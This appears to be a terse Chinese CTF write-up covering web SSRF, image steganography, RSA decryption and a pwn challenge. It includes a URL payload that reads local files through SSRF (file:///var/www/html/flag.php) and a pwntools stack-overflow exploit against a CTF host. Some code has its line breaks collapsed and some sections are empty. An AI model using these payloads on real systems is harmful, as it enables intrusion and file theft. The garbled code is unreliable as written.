1

 #web351curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);echo ($result);

【提示不允许外部】对应源码：$_SERVER（remoteaddr）：

?url=http://127.0.0.1/flag.php

伪协议可以读:url=file:///var/www/html/flag.php

2

取反，打开图片获得解压密码(解压得：两张图和一个txt文本)

python">f=open("1.jpg",'rb')
f1=f.read()#二进制形式
with open('flag.jpg','wb') as f2:for i in f1:if i==0:f2.write(bytes([0x0]))#这里的b是int形式，要转换成bytes时，使用bytes(),且里面的内容需要加[]else:f2.write(bytes([0x100-i]))
f.close()
f2.close()

16进制位移

大小写组合爆破？

steghide密码爆破

python">import osdef all_casings(input_string):if not input_string:yield""else:first = input_string[:1]if first.lower() == first.upper():for sub_casing in all_casings(input_string[1:]):yield first + sub_casingelse:for sub_casing in all_casings(input_string[1:]):yield first.lower() + sub_casingyield first.upper() + sub_casingif __name__ =='__main__':for x in all_casings("qsnctf"):os.system("steghide extract -sf 2.jpg -p "+x)print(x)

 

0宽隐写

3

4

import gmpy2
import libnum
from Crypto.Util.number import *
from binascii import a2b_hex, b2a_hexflag = "*****************"
p=109935857933867829728985398563235455481120300859311421762540858762721955038310117609456763338082237907005937380873151279351831600225270995344096532750271070807051984097524900957809427861441436796934012393707770012556604479065826879107677002380580866325868240270494148512743861326447181476633546419262340100453
q=127587319253436643569312142058559706815497211661083866592534217079310497260365307426095661281103710042392775453866174657404985539066741684196020137840472950102380232067786400322600902938984916355631714439668326671310160916766472897536055371474076089779472372913037040153356437528808922911484049460342088834871
e=15218928658178
c=262739975753930281690942784321252339035906196846340713237510382364557685379543498765074448825799342194332681181129770046075018122033421983227887719610112028230603166527303021036386350781414447347150383783816869784006598225583375458609586450854602862569022571672049158809874763812834044257419199631217527367046624888837755311215081173386523806086783266198390289097231168172692326653657393522561741947951887577156666663584249108899327053951891486355179939770150550995812478327735917006194574412518819299303783243886962455399783601229227718787081785391010424030509937403600351414176138124705168002288620664809270046124
n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

5

from pwn import *
p = remote("node3.buuoj.cn",5302)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()